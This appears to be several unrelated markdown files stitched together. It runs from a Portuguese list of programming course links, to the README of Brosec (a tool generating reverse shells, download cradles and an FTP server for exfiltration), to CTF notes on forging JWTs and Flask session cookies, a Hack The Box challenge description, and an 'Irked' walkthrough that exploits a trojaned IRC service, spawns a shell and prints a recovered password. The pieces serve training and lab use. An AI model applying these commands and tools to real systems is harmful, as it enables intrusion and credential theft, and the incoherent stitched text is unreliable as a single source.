- [Curso de PowerShell en Español](https://www.youtube.com/playlist?list=PLs3CpSZ8xiuS-qgB7SgrMoDaJcFY88EIA)
> Cursos para aprender Powershell em Inglês
- [PowerShell Master Class](https://www.youtube.com/playlist?list=PLlVtbbG169nFq_hR7FcMYg32xsSAObuq8)
- [PowerShell For Beginners Full Course](https://www.youtube.com/watch?v=UVUd9_k9C6A&ab_channel=Nerd%27slesson)
- [Powershell Advanced Tools and Scripting Full Course](https://www.youtube.com/watch?v=K4YDHFalAK8&ab_channel=Nerd%27slesson)
- [PowerShell Master Class - PowerShell Fundamentals](https://www.youtube.com/watch?v=sQm4zRvvX58&ab_channel=JohnSavill%27sTechnicalTraining)
## 🐥 Sites e cursos para aprender Flask
> Cursos para aprender Flask em Português
- [Introdução - Curso de Flask](https://www.youtube.com/watch?v=r40pC9kyoj0&list=PL3BqW_m3m6a05ALSBW02qDXmfDKIip2KX&ab_channel=J%C3%BAliaRizza)
- [Curso Flask - Aula 00 - Início](https://www.youtube.com/watch?v=MysMy8aV2NA&list=PLWhiA_CuQkbBhvPojHOPY81BmDt2eSfgI&ab_channel=FilipeMorelliDeveloper)
- [Curso Programação - Como Criar um Site em Python com Flask mysql - 2022 - 01](https://www.youtube.com/watch?v=__cux2CPBN4&list=PL2Dw5PtrD32wC32rRLJSueOFPRgekHxNG&ab_channel=Cursosdeprograma%C3%A7%C3%A3o)
- [Como Criar e Publicar um Site em Python com Flask](https://www.youtube.com/watch?v=K2ejI4z8Mbg&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
- [Curso Programação - Criando Uma loja online em python usando o framework flask - 01](https://www.youtube.com/watch?v=h5XFtuBlrT4&ab_channel=Cursosdeprograma%C3%A7%C3%A3o)
- [Desenvolvimento Web com Python (Flask Framework)](https://www.youtube.com/watch?v=rGT5lG71pMQ&ab_channel=DankiCode)
- [Curso de Flask 2020 - Parte 1 (Introducción).](https://www.youtube.com/watch?v=Yz1gUwXPPJw&list=PLuB3bC9rWQAsHK6rL87Vz9mfMIlk4ewwL&ab_channel=MundoPython)
- [Flask (Micro Framework Web para Python) - Dicionário do Programador](https://www.youtube.com/watch?v=e9EPb5AoMf8&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Flask em Inglês
- [Flask Course - Python Web Application Development](https://www.youtube.com/watch?v=Qr4QMBUPxWo&ab_channel=freeCodeCamp.org)
- [Building your first Flask app - Python on the web - Learning Flask series Pt. 1](https://www.youtube.com/watch?v=BUmUV8YOzgM&list=PLF2JzgCW6-YY_TZCmBrbOpgx5pSNBD0_L&ab_channel=JulianNash)
- [Python Flask Tutorial: Full-Featured Web App Part 1 - Getting Started](https://www.youtube.com/watch?v=MwZwr5Tvyxo&list=PL-osiE80TeTs4UjLw5MM6OjgkjFeUxCYH&ab_channel=CoreySchafer)
- [Python Flask Tutorial 1 - Introduction + Getting Started With Flask](https://www.youtube.com/watch?v=Kja_28SNIow&list=PLS1QulWo1RIZ6OujqIAXmLR3xsDn_ENHI&ab_channel=ProgrammingKnowledge)
- [Python Website Full Tutorial - Flask, Authentication, Databases & More](https://www.youtube.com/watch?v=dam0GPOAvVI&ab_channel=TechWithTim)
- [Flask Full Series - Web Application Development with Python - Introduction - Episode 1](https://www.youtube.com/watch?v=p068JokuThU&list=PLOkVupluCIjuPtTkhO6jmA76uQR994Wvi&ab_channel=JimShapedCoding)
- [Learn Flask for Python - Full Tutorial](https://www.youtube.com/watch?v=Z1RJmh_OqeA&ab_channel=freeCodeCamp.org)
- [Flask Tutorial #1 - How to Make Websites with Python](https://www.youtube.com/watch?v=mqhxxeeTbu0&list=PLzMcBGfZo4-n4vJJybUVV3Un_NFS5EOgX&ab_channel=TechWithTim)
- [Flask [ Python Microframework ] Crash Course 2021 For Beginners](https://www.youtube.com/watch?v=3U1iHcqijCA&ab_channel=BekBrace)
- [Make A Python Website As Fast As Possible!](https://www.youtube.com/watch?v=kng-mJJby8g&ab_channel=TechWithTim)
## 🐔 Sites e cursos para aprender Spring
> Cursos para aprender Spring em Português
- [Spring Boot | Curso Completo 2022](https://www.youtube.com/watch?v=LXRU-Z36GEU&ab_channel=MichelliBrito)
- [Curso Spring - Introdução - Parte 1 de 6 (Tutorial)](https://www.youtube.com/watch?v=KIoMhHiap88&list=PLmPk8AhMVhETu1h9ZgVZyvquzrY4BwVWS&ab_channel=AprendaProgramarEmMinutos)
- [Curso Spring Boot aula 01: Iniciando uma aplicação Spring Boot](https://www.youtube.com/watch?v=OHn1jLHGptw&list=PL8iIphQOyG-DHLpEx1TPItqJamy08fs1D&ab_channel=MichelliBrito)
- [O que é Spring Framework? #Hipsterspontotube](https://www.youtube.com/watch?v=5XPojnx9bb8&ab_channel=AluraCursosOnline)
- [Spring Boot Essentials 2 - Introdução ao curso.](https://www.youtube.com/watch?v=bCzsSXE4Jzg&list=PL62G310vn6nFBIxp6ZwGnm8xMcGE3VA5H&ab_channel=DevDojo)
> Cursos para aprender Spring em Inglês
- [Spring Boot Tutorial | Full Course [2022] [NEW]](https://www.youtube.com/watch?v=9SGDpanrc8U&ab_channel=Amigoscode)
- [Spring framework Tutorial (001 Spring Framework Master Class Preview)](https://www.youtube.com/watch?v=MHoFSfXGX_A&list=PLw_k9CF7hBpJJsRWAhwSrDlWAzuMV0irl&ab_channel=FreeOnlineCourses)
- [Spring Framework Course Overview | Content to cover | Prerequisite | Spring Tutorial in HINDI](https://www.youtube.com/watch?v=KRMNTudb0AY&list=PL0zysOflRCekeiERASkpi-crREVensZGS&ab_channel=LearnCodeWithDurgesh)
- [Spring Boot Tutorial | Full Course [2022]](https://www.youtube.com/watch?v=slTUtTSwRKU&list=PLGRDMO4rOGcNSBOJOlrgQqGpIgo6_VZgR&ab_channel=JavaGuides)
- [Spring framework tutorial for beginners with examples in eclipse | Why spring inversion of control ?](https://www.youtube.com/watch?v=r2Q0Jzl2qMQ&list=PL3NrzZBjk6m-nYX072dSaGfyCJ59Q5TEi&ab_channel=SeleniumExpress)
- [Spring Boot Complete Tutorial - Master Class](https://www.youtube.com/watch?v=zvR-Oif_nxg&ab_channel=DailyCodeBuffer)
- [Spring Full Course - Learn Spring Framework In 3 Hours | Spring Framework Tutorial | Simplilearn](https://www.youtube.com/watch?v=j3byTqx7KDE&ab_channel=Simplilearn)
- [Spring Boot Tutorial for Beginners (Java Framework)](https://www.youtube.com/watch?v=vtPkZShrvXQ&ab_channel=freeCodeCamp.org)
- [5 Spring Boot Projects in 10 Hours - Line by Line Coding](https://www.youtube.com/watch?v=VR1zoNomG3w&ab_channel=JavaGuides)
- [Spring Boot Roadmap - How To Master Spring Boot](https://www.youtube.com/watch?v=cehTm_oSrqA&ab_channel=Amigoscode)
- [Spring Security | FULL COURSE](https://www.youtube.com/watch?v=her_7pa0vrg&ab_channel=Amigoscode)
- [Spring Boot Full Stack with Angular | Full Course [2021] [NEW]](https://www.youtube.com/watch?v=Gx4iBLKLVHk&ab_channel=Amigoscode)
- [Spring Framework Tutorial for Beginners - Full Course](https://www.youtube.com/watch?v=QqBl92wZafo&ab_channel=TechCode)
- [Spring Framework Tutorial | Full Course](https://www.youtube.com/watch?v=If1Lw4pLLEo&ab_channel=Telusko)
- [Spring Full Course - Learn Spring Framework in 4 Hours | Spring Framework Tutorial | Edureka](https://www.youtube.com/watch?v=VvGjZgqojMc&ab_channel=edureka%21)
- [Spring Core Tutorial in one Video | Learn Spring Core step by step in Hindi](https://www.youtube.com/watch?v=XQd_D19fPvs&ab_channel=LearnCodeWithDurgesh)
- [Spring Boot Microservice Project Full Course in 6 Hours](https://www.youtube.com/watch?v=mPPhcU7oWDU&ab_channel=ProgrammingTechie)
- [Spring Boot - Learn Spring Boot 3 (2 Hours)](https://www.youtube.com/watch?v=-mwpoE0x0JQ&ab_channel=Amigoscode)
- [Spring Security Tutorial - [NEW] [2023]](https://www.youtube.com/watch?v=b9O9NI-RJ3o&ab_channel=Amigoscode)
## 🐗 Sites e cursos para aprender Tailwind CSS
> Cursos para aprender Tailwind CSS em Português
- [Curso gratuito Tailwind CSS #1 - Introdução e instalação](https://www.youtube.com/watch?v=1eLaBow7Zbo&list=PLcoYAcR89n-r1m-tMfV4qndrRWpT_rb9u&ab_channel=TiagoMatos)
- [Tailwind CSS - Curso rápido](https://www.youtube.com/watch?v=1qH3wAtX4So&ab_channel=RicardoSanches)
- [Tailwind CSS // Dicionário do Programador](https://www.youtube.com/watch?v=i_EKstz3x04&ab_channel=C%C3%B3digoFonteTV)
- [Como começar no Tailwind CSS 3.0?](https://www.youtube.com/watch?v=mK_19iqznc8&ab_channel=EmersonBr%C3%B4ga)
- [Aprenda Tailwind CSS recriando a interface do Insta!](https://www.youtube.com/watch?v=48TaQMfD8fo&ab_channel=C%C3%B3digoEscola)
> Cursos para aprender Tailwind CSS em Inglês
- [Tailwind CSS Full Course for Beginners | Complete All-in-One Tutorial | 3 Hours](https://www.youtube.com/watch?v=lCxcTsOHrjo&ab_channel=DaveGray)
- [Tailwind CSS Tutorial #1 - Intro & Setup](https://www.youtube.com/watch?v=bxmDnn7lrnk&list=PL4cUxeGkcC9gpXORlEHjc5bgnIi5HEGhw&ab_channel=TheNetNinja)
- [Tailwind in 100 Seconds](https://www.youtube.com/watch?v=mr15Xzb1Ook&list=PLro89l7qVjR_aPxpjPH6V3YjckCbuvDzm&ab_channel=Fireship)
- [Learn Tailwind CSS – Course for Beginners](https://www.youtube.com/watch?v=ft30zcMlFao&ab_channel=freeCodeCamp.org)
- [Build and Deploy a Fully Responsive Website with Modern UI/UX in React JS with Tailwind](https://www.youtube.com/watch?v=_oO4Qi5aVZs&ab_channel=JavaScriptMastery)
- [Course Intro – Tailwind CSS v2.0: From Zero to Production](https://www.youtube.com/watch?v=elgqxmdVms8&list=PL5f_mz_zU5eXWYDXHUDOLBE0scnuJofO0&ab_channel=TailwindLabs)
- [Ultimate Tailwind CSS Tutorial // Build a Discord-inspired Animated Navbar](https://www.youtube.com/watch?v=pfaSUYaSgRo&ab_channel=Fireship)
- [Tailwind CSS 3 Crash Course](https://www.youtube.com/watch?v=LyRWNJK8I6U&ab_channel=codedamn)
- [Tailwind in 100 Seconds](https://www.youtube.com/watch?v=mr15Xzb1Ook&ab_channel=Fireship)
## 🦐 Sites e cursos para aprender Styled Components
> Cursos para aprender Styled Components em Português
- [Styled Components, por onde começar? Os poderes do CSS in JS](https://www.youtube.com/watch?v=QdfjWRc4ySA&ab_channel=MarioSouto-DevSoutinho)
- [Como utilizar Styled Components no React | CSS no React | Criando App com React](https://www.youtube.com/watch?v=KP5AsH_j21U&ab_channel=RodolfoMori)
- [Styled Components (O construtor de elementos do React) // Dicionário do Programador](https://www.youtube.com/watch?v=p4jYFJNEyqA&ab_channel=C%C3%B3digoFonteTV)
- [Aprenda Styled Components avançado do jeito fácil!](https://www.youtube.com/watch?v=Rbe8fqdc6T4&ab_channel=ArielBetti)
- [Utilizando Styled Components (CSS-in-JS) no ReactJS e React Native | Diego Fernandes](https://www.youtube.com/watch?v=R3S8DEzEn6s&ab_channel=Rocketseat)
- [Como Usar CSS e Estilizar Componentes no React JS - Styled Components](https://www.youtube.com/watch?v=j_cLz_A2odI&ab_channel=ProgramadorEspartano)
> Cursos para aprender Styled Components em Inglês
- [CSS-in-JS com Styled Components no React Native | Decode #25](https://www.youtube.com/watch?v=ZsVGOmZLgec&ab_channel=Rocketseat)
- [Styled Components Crash Course & Project](https://www.youtube.com/watch?v=02zO0hZmwnw&ab_channel=TraversyMedia)
- [React Styled Components - 1 - Introduction](https://www.youtube.com/watch?v=FSCSdAlLsYM&list=PLC3y8-rFHvwgu-G08-7ovbN9EyhF_cltM&ab_channel=Codevolution)
- [Styled Components Is the Only Way To Do CSS](https://www.youtube.com/watch?v=54-hITMASgM&ab_channel=EngineerMan)
- [Styled Components Full Tutorial - Style Your Components in React](https://www.youtube.com/watch?v=-FZzPHSLauc&ab_channel=PedroTech)
- [React Styled Components Library Tutorial](https://www.youtube.com/watch?v=CDVEXZP0ki4&ab_channel=LaithAcademy)
- [Styled Components - Beginners Tutorial](https://www.youtube.com/watch?v=vKI5aEsvch8&ab_channel=MonsterlessonsAcademy)
- [React Hooks Tutorial - A Crash Course on Styled Components, JSX, React Router, and HOC](https://www.youtube.com/watch?v=iVRO0toVdYM&ab_channel=freeCodeCamp.org)
- [Understanding the Styled Components Basics - with React](https://www.youtube.com/watch?v=nkfaZ8ctzpE&ab_channel=DailyTuition)
## 🐎 Sites e cursos para aprender Magento
> Cursos para aprender Magento em Português
- [Curso de Magento - Aula 1 – Introdução e Download](https://www.youtube.com/watch?v=iDl0IiJt7mQ&list=PLpEvhvupz-uQiY_aD5GGCChNLJMdZF4hS&ab_channel=iConectado-CursosOnline)
- [Como Instalar o Magento 2 (Tutorial em Português)](https://www.youtube.com/watch?v=8jcy4YxaI5s&list=PLDwV4OI4NbD1abkoGuLFScvGBvgbHwihR&ab_channel=MestreMagento)
- [Aula 1 - Magento 2 Curso de Desenvolvimento de Módulo](https://www.youtube.com/watch?v=MHFz2t1aVug&list=PLAB1CVlnN7Lv2nxe3JkVaGfKFOUfqyuuN&ab_channel=AbraaoMarques)
- [Aula 01 - Cadastro de Categorias Magento 2](https://www.youtube.com/watch?v=qCgpHmeXadM&list=PL1KgCGp7BEH6T_91GdpjmZeIHN_pdr_MM&ab_channel=ECOM-DPlataformaparaLojasVirtuais)
- [Curso de Magento - Aula 01 - Introdução ao Curso de Magento](https://www.youtube.com/watch?v=kK9D2wvv9jE&list=PLxNM4ef1Bpxi7fkqIK0RfY3bj-sTEFsDZ&ab_channel=PortalHugoCursos)
> Cursos para aprender Magento em Inglês
- [The complete Magento2 course](https://www.youtube.com/watch?v=zsasXJTbG5k&ab_channel=TechReview)
- [Magento 2 Beginner Class, Lesson #1: Introduction to Magento 2](https://www.youtube.com/watch?v=u81X-sjgmQ0&list=PLtaXuX0nEZk9eL59JGE3ny-_GAU-z5X5D&ab_channel=OSTraining)
- [How to Setup Magento on Your Computer 01/10 | Magento 2 Tutorials for Beginners (2019) | MageCafe](https://www.youtube.com/watch?v=XwXWg5fU7tY&list=PLeoWPZvrjokdF3KGMiEFuLXLIu1l2xlvd&ab_channel=Codilar%7CMagentoDevelopmentCompanyIndia)
- [Magento 2 Project Overview for Beginner Developers](https://www.youtube.com/watch?v=yT6CGzt6eLM&ab_channel=MaxPronko)
- [Magento 2 Introduction](https://www.youtube.com/watch?v=y6i-dVHN2vU&list=PLju9v8YUzEuzYxXrF8ucXwxW_Xcgu1dYd&ab_channel=AstralWebInc.)
- [how to Install Magento 2](https://www.youtube.com/watch?v=4FYd6lRRATA&list=PL9Q0S-CmtAhJVjwnK5ip6H84sCuRQcACY&ab_channel=AlaaAl-Maliki)
- [Lesson 4: A Module in Magento 2 | Magento 2 for Beginners | Mage Mastery](https://www.youtube.com/watch?v=CGEWkApKGbQ&list=PLwcl8DqLMv9cF8XBYeGDnelmV0UqO2xAJ&ab_channel=MaxPronko)
- [Beginner to Certified - The Path of a Magento Developer](https://www.youtube.com/watch?v=RPCh2ca0EIg&ab_channel=MarkShust)
- [How to prepare for Magento Certification Exams? (Tips and Tricks)](https://www.youtube.com/watch?v=Zq6xpA7dHpE&ab_channel=BartTv)
## 🐜 Sites e cursos para aprender ArangoDB
> Cursos para aprender ArangoDB em Português
- - [Introdução ao ArangoDB através do Python Português](https://www.youtube.com/watch?v=umgJygSY2V0&ab_channel=ArangoDB)
- - [Introdução ao banco de dados NOSQL - ArangoDB](https://www.youtube.com/watch?v=v45go6zNNkY&ab_channel=DanielFerreira)
> Cursos para aprender ArangoDB em Inglês
- - [ArangoDB Tutorial - Databases every developer should know about](https://www.youtube.com/watch?v=4C4zqhXwCKs&ab_channel=LearnCode.academy)
- - [ArangoDB Dev Days 2021: Lessons Learned: Creating a Complete ERP-System with ArangoDB](https://www.youtube.com/watch?v=j3EVRtD3LBE&ab_channel=ArangoDB)
- - [ArangoDB Graph Database Syntax Part 1 - Traversal](https://www.youtube.com/watch?v=0U8TfLOp184&ab_channel=ArangoDB)
- - [Custom Pregel in ArangoDB Feature Preview and Demo](https://www.youtube.com/watch?v=DWJ-nWUxsO8&ab_channel=ArangoDB)
- - [Introduction to ArangoDB Oasis](https://www.youtube.com/watch?v=0xzn1eOYnTU&ab_channel=ArangoDB)
- - [Fundamentals and Best Practices of ArangoDB Cluster Administration](https://www.youtube.com/watch?v=RQ33fkgUg64&ab_channel=ArangoDB)
- - [Learn all about the new Search Engine ArangoSearch in ArangoDB 3.4](https://www.youtube.com/watch?v=iDznGhelajY&ab_channel=ArangoDB)
- - [ArangoDB - How to Install and Use ArangoDB Database on Windows](https://www.youtube.com/watch?v=M-7hB-4kHtk&ab_channel=DevNami)
- - [GraphQL and ArangoDB](https://www.youtube.com/watch?v=vaUdiWU-src&ab_channel=ArangoDB)
## 📚 Sites e cursos para aprender Linha de comando
> Cursos para aprender Bash em Português
- [Curso Básico de Bash](https://www.youtube.com/playlist?list=PLXoSGejyuQGpf4X-NdGjvSlEFZhn2f2H7)
- [Curso intensivo de programação em Bash](https://www.youtube.com/playlist?list=PLXoSGejyuQGr53w4IzUzbPCqR4HPOHjAI)
- [Curso de Shell Scripting - Programação no Linux](https://www.youtube.com/playlist?list=PLucm8g_ezqNrYgjXC8_CgbvHbvI7dDfhs)
- [Curso de Terminal Linux - Daniel Berg](https://www.youtube.com/playlist?list=PLbV6TI03ZWYXXwbP2TNTbviUaFh6YqqVt)
- [Curso de Linux Avançado Terminal - Dicas do Guarapa](https://www.youtube.com/playlist?list=PLGw1E40BSQnRZufbzjGVzkH-O8SngPymp)
- [Comandos para o terminal (Windows, macOS e Linux) - Lucas Caton](https://www.lucascaton.com.br/2018/01/07/comandos-para-o-terminal-windows-macos-e-linux)
> Cursos para aprender Bash em Espanhol
- [Curso Profesional de Scripting Bash Shell](https://www.youtube.com/playlist?list=PLDbrnXa6SAzUsIAqsjVOeyagmmAvmwsG2)
- [Curso Linux: Comandos Básicos [Introducción al Shell BASH]](https://www.youtube.com/playlist?list=PLN9u6FzF6DLTRhmLLT-ILqEtDQvVf-ChM)
> Cursos para aprender Bash em Inglês
- [Bash Scripting Full Course 3 Hours](https://www.youtube.com/watch?v=e7BufAVwDiM&ab_channel=linuxhint)
- [Linux Command Line Full course: Beginners to Experts. Bash Command Line Tutorials](https://www.youtube.com/watch?v=2PGnYjbYuUo&ab_channel=Geek%27sLesson)
- [Bash in 100 Seconds](https://www.youtube.com/watch?v=I4EWvMFj37g&ab_channel=Fireship)
- [Bash Script with Practical Examples | Full Course](https://www.youtube.com/watch?v=TPRSJbtfK4M&ab_channel=Amigoscode)
- [Beginner's Guide to the Bash Terminal](https://www.youtube.com/watch?v=oxuRxtrO2Ag&ab_channel=JoeCollins)
- [212 Bash Scripting Examples](https://www.youtube.com/watch?v=q2z-MRoNbgM&ab_channel=linuxhint)
- [Linux Bash for beginners 2022](https://www.youtube.com/watch?v=qALScO3E61I&ab_channel=GPS)
- [Bash scripting tutorial for beginners](https://www.youtube.com/watch?v=9T2nEXlLy9o&ab_channel=FortifySolutions)
- [Linux CLI Crash Course - Fundamentals of Bash Shell](https://www.youtube.com/watch?v=S99sQLravYo&ab_channel=codedamn)
- [Shell Scripting](https://www.youtube.com/playlist?list=PLBf0hzazHTGMJzHon4YXGscxUvsFpxrZT)
- [Shell Scripting Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIYmaxcEqw5JhK3b-6rgdWO_)
- [Bash Scripting | Complete Course](https://www.youtube.com/playlist?list=PLgmzaUQcOhaqQjXaqz7Ky5a_xj_8OlCK4)
- [Complete Shell Scripting Tutorials](https://www.youtube.com/playlist?list=PL2qzCKTbjutJRM7K_hhNyvf8sfGCLklXw)
- [Bash Scripting 3hrs course](https://www.youtube.com/playlist?list=PL2JwSAqE1httILs055eEgbnO9oTu1otIG)
- [Bash Zero to Hero Series](https://www.youtube.com/playlist?list=PLP8aFdeDk9g5Pg7WHYfv6EsD1D8hrx5AJ)
<details>
<summary>📝 Alguns comandos úteis (Linux, MacOs e Powershell/Windows)</summary>
- lista os arquivos presentes no diretório
```bash
ls # => lista do diretorio atual
# ou
dir / tree /f
# ou
ls <caminho do diretorio> # => lista do diretorio passado
```
- Altera diretório atual
```bash
cd #=> volta para a home
# ou
cd <caminho> #=> leva para o caminho passado
```
- Remove arquivo
```bash
rm <arquivo>
```
- Remove diretório cujo caminho é dado como operando
```bash
rmdir <caminho>
# => o diretório deve estar vazio, ou seja, antes você tem que remover todos os arquivos do diretório
```
- Escreve na tela o conteúdo do arquivo do caminho dado como operando
```bash
cat <arquivo>
```
- Escreve na tela o caminho do diretório de trabalho atual
```bash
pwd
```
- Lista os comandos já executados
```bash
history
```
- Limpa a tela do terminal
```bash
clear # => (clc no Powershell)
```
</details>
|
![](https://i.imgur.com/1QyMN3G.png "logo by Vilhaum - https://github.com/vilhaum")
[![Black Hat Arsenal](https://www.toolswatch.org/badges/arsenal/2016.svg)](https://www.toolswatch.org/2016/06/the-black-hat-arsenal-usa-2016-remarkable-line-up/)
Overview (tl;dr)
=========
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.
Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as...
[![asciicast](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg.png)](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg)
Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so.
[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc)
##### Additional Features and Usage Examples
###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http)
Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered.
![](http://i.imgur.com/47BHim4.gif)
###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp)
Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).
###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode)
A encoder/decoder utility designed with penetration testers in mind that often find the need to encode and decode various payloads.
![](https://i.imgur.com/EgTMG88.png)
![](http://i.imgur.com/wxFpA7o.png)
Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki).
Installation
============
The preferred method of installation (in order to get all of the latest updates) is to clone the source and install the dependencies manualy (git clone && npm install).
However, a stable build can be quickly installed via the following instructions.
### Mac
#### Quick Installation
- Install [Homebrew](https://brew.sh/)
- `brew tap t94j0/security` - Use t94j0's tap which contains the brosec formula
- `brew install brosec` - Installs the brosec package
#### Kali Linux
- `apt-get install npm build-essential g++ xsel` Install dependencies
- `npm install -g n` Install n (nodejs version manager)
- If the above fails, try - `npm config set registry http://registry.npmjs.org/`
- `n latest` Install latest version of nodejs
- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin)
### Windows
- Install [nodejs](https://nodejs.org/download) via official installer
- `npm install -g Brosec` - Install Brosec
#### If you have trouble installing, you can also try a compiled copy of Brosec. See [Releases](https://github.com/gabemarshall/Brosec/releases).
Swag
====
<a name="sticker">Want a free Brosec sticker?</a>
<br><br> Submit a pull request, create an issue, or just send feedback to <gabemarshall@me.com> and I'll happily send you a sticker (supplies limited, free shipping to continental US only).
Otherwise you can order one from [StickerMule](https://www.stickermule.com/marketplace/10877-brosec-security-for-bros)
Credits
======
Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In addition, many payloads were referenced from other resources and deserve a shoutout.
- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)
- [SecLists](https://github.com/danielmiessler/SecLists)
Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor)
|
# Scanning
## Nikto
- [https://github.com/sullo/nikto](Nikto) is a web server scanner
# JavaScript
## Window object
- Gloabal functios and variables declared with `var` become the property of the global object
```js
pink = "draconian";
console.log(window.pink) // draconian
```
## JSFuck
Looks like: `[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!!`
Can be deconfuscated: https://enkhee-osiris.github.io/Decoder-JSFuck/
# JWT tokens
## Attack vectors
### Asymetric RS -> HS ([example](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/))
The public key is used for verification and the algorithm can be switched from RS to HS
### JWKS Spoofing ([example](https://www.youtube.com/watch?v=KUyuvnez0ks))
Whenever the `jku` header is being used and can make remote requests, this can be a good attack vector
# Flask
## Crafting sessions tokens
When the SECRET_KEY is given (or bruteforced), these tokens can be maliciously crafted.
The tool [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) provides us many useful functions.
- Crafting: `flask-unsign --legacy --sign --cookie '{"key":val}' --secret 'SECRET_KEY'`
- Decoding: `flask-unsign --decode --cookie 'cookie_val'`
- Bruteforcing: `flask-unsign --unsign --wordlist /path/to/wordlist --cookie 'cookie_val'`
# Wordpress
## WPSCAN
`wpscan --url URL`
|
<img src="https://user-images.githubusercontent.com/72598486/143733814-fa1960d3-0366-4061-9912-51bfb91b1abc.png" width="1000">
# Obfusc8ted:
You and the AppleLabs' Incident Response Team have been notified of a potential breach to a Human Resources' workstation. According to the Human Resources representative, they did not notice any anomalous activity while browsing the web, but the AppleLabs' system information and event management (SIEM) instance alerted on a suspicious domain. Moments later, the host-based intrusion detection system (HIDS) alerted on several malicious programs acting as potential keyloggers. While the AppleLabs' IT and Incident Response Teams struggle to find the answers, can you lend us your digital forensic experience to hunt down this threat actor?
## Starting Point:
Password = hackthebox
```
cd ~
mkdir Obfusc8ted
cd /Obfusc8ted
git clone https://github.com/RoseSecurity/Obfusc8ted
unzip Obfusc8ted.zip
```
## Objective:
Learn new techniques to parse obfuscated network traffic in an attempt to identify malicious threat actors' intentions.
Difficulty:
```
Easy
```
Flag Format:
```
HTB{s0me_fl4g_her3}
```
Author(s):
```
Kleptocratic and RoseSecurity
```
## Walkthrough:
The password for Walkthrough.zip is the final flag, but if you could not discover the answer, check out https://medium.com/@RoseSecurity/obfusc8ted-walkthrough-making-sense-of-malware-infested-network-traffic-8b61c2c60c4e!
## Happy Hunting!
![content-blog-cybersecurity-threat-hunting-risk-19003-001n](https://user-images.githubusercontent.com/72598486/143734115-394cb6a1-37c6-4f65-82e4-b57a31fb6ad3.jpg)
|
# Irked
__URL__: https://www.hackthebox.eu/home/machines/profile/163
__Machine IP__: 10.10.10.117
__DATE__ : 10/04/2019
-------------------------------------------------------------------------------
Let's start with the basics
`NMAP` - Full port scan
------------------------
```bash
➜ nmap -p- 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-21 15:16 IST
Nmap scan report for 10.10.10.117
Host is up (0.16s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
4027/tcp filtered bxp
6324/tcp filtered hrd-ncs
6697/tcp open ircs-u
7852/tcp filtered unknown
8067/tcp open infi-async
8218/tcp filtered unknown
8901/tcp filtered jmb-cds2
33435/tcp filtered mtrace
55801/tcp open unknown
65534/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2713.11 seconds
```
Okay so as usual we can see the port 22 and 80 are open. But what looked interesting was `ircs-u` i.e port `6697`.
**Why this is interesting?**
Because we can try to connect with the IRC and maybe even try to exploit that.
-------------------------------------------------------------------------------
Let's test whether there is something fishy with the IRC service:
```bash
➜ nmap -sV --script=irc-unrealircd-backdoor 10.10.10.117 -p 6697
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-21 20:20 IST
Nmap scan report for 10.10.10.117
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds
```
hmmm....trojaned version of IRC meaning someone has messed with it... Let's fire up the big gun
So we use metasploit to exploit this CVE:
![alt text](images/irked-1.png)
All the options are set Now, :boom: `EXPLOIT` :boom:
![alt text](images/irked-2.png)
After Getting reverse shell I spawn the TTY shell using python:
```python
python -c 'import pty; pty.spawn("/bin/sh")'
```
I spent sometime looking around and found a user called `djmardov` and found out that there's a backup file in the `Document` folder.
```bash
$ cat /home/djmardov/Documents/.backup
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
```
hmm... :thinking_face:
After lot of messing around, reading forum comments and what not I figured out why it was referring to Stego.
Basically If you visit the website(http://10.10.10.117/) we are prompted with the following page:
![alt text](images/homepage.png)
I asked myself a question `what if this yellow image has something to do with Stego?` So why not test this with something like steghide.
```bash
➜ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
```
Wooh!!! :tada:
------------------------------------------------------------------------------
I got `pass.txt` using `UPupDOWNdownLRlrBAbaSSss` as steghide password
```bash
➜ cat pass.txt
Kab6h+m+bbp2J:HG
```
